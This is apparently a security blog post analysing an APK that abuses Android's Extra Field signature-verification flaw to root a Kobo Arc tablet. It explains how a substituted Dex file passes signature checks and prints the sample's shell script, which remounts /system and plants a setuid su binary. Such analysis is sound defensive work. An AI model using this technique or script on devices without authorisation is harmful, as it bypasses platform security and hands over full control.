Android Extra Field Vulnerability Spotted in the Wild

It has been 20 days since the Extra Field vulnerability (also known as Chinese Master Keys) was first reported (translated link) by the Android Security Squad. It has now been spotted in the wild. The linked sample (MD5: C9F4C62521C04B8ADD796A1D5CEE08B0), which will be referred to as Arctic.apk, contains another APK named DoubleRainbow.apk (MD5: 1B14AD438375E6C25F645A855828D78F). DoubleRainbow.apk contains the Extra Field vulnerability. This APK is not malware. It is designed to root the Kobo Arc tablet.

A Brief Overview

The Extra Field vulnerability exists because of a signed / unsigned error when verifying the cryptographic signature of an APK's files. In a Zip file (APKs are Zip files) there is an entry Extra Field in each file's local header (see header structure here). When checking the signature of the file, the Extra Field Length is treated as a signed short. The verifier attempts to jump over the Extra Field to the file's bytes. When set to 0xFFFD (-3) the verifier will jump 3 bytes backward into the file name (classes.dex) which shares three bytes (dex) with the start of the Dex file. The loader treats the Extra Field length correctly, as an unsigned short. So the loader will jump forward, over the Extra Field, to load the file. If you place the original Dex file, overlapping the file name, into the Extra Field it will be verified. You may then place a different Dex file in  the original file's place. This injected Dex file (likely malicious) will be loaded and run without breaking the APK's signature.

The Sample

Checking the files inside of Arctic.apk, it is fairly obvious that it is up to something. Inside the /assets/ folder we see the following files:

DoubleRainbow.apk
su
Superuser.apk
wifiScript.sh

The presence of Superuser.apk indicates that Arctic will likely be rooting the device. Artic is fairly simple, it installs and runs DoubleRainbow.apk, which was originally a system package for the Kobo Status Bar. Since it is a system package, it is granted elevated privileges on the device. The Extra Field exploit allowed the author to inject custom code to be run by this package. In order to match the size of the replaced classes.dex, the injected Dex file was padded out with a 2599 byte string, "LOLOLOL...". Once executed, the custom classes.dex executes wifiScript.sh, the contents of which can be seen here:

#!/system/bin/sh

mount -o rw,remount /system
cat /data/data/com.android.innocomm.EngineerMode/su >/system/xbin/su
chmod 6755 /system/xbin/su
cat /data/data/com.android.innocomm.EngineerMode/Superuser.apk >/system/app/Superuser.apk
chmod 644 /system/app/Superuser.apk
pm uninstall com.kobo.statusbar

Since DoubleRainbow.apk is running in a privileged mode, all it needs to do is copy over su and Superuser.apk.

Conclusion

The APK was authored by @zhuowei and can be found on their Github. None of the source code was being returned by Google since it was posted so recently. The repository was found through the author's name on Arctic.apk's certificate. As we can see from the following, the Kobo Status Bar APK (DoubleRainbow.apk) still contains the certificate issued by Jason Gamblen from Kobo Inc.

Issuer: C=CA, ST=British Columbia, L=Vancouver, O=Unknown, OU=Unknown, CN=Zhuowei Zhang
Issuer: C=CA, ST=Ontario, L=Toronto, O=Kobo, OU=Android Team, CN=Android/emailAddress=jgamblen@kobobooks.com

While this APK is not malicious, it demonstrates how easy it is to gain root access using the Extra Field vulnerability. It is expected that this vulnerability and the Master Keys vulnerability will become common occurrences in Android malware.